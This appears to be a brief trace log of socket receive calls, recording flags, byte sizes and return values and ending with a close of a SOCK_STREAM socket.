Receive flags = NO_FLAG_SET, size = 2153, size_out = 2153 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 9458 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 6958, size_out = 6958 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 11488, size_out = 11488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn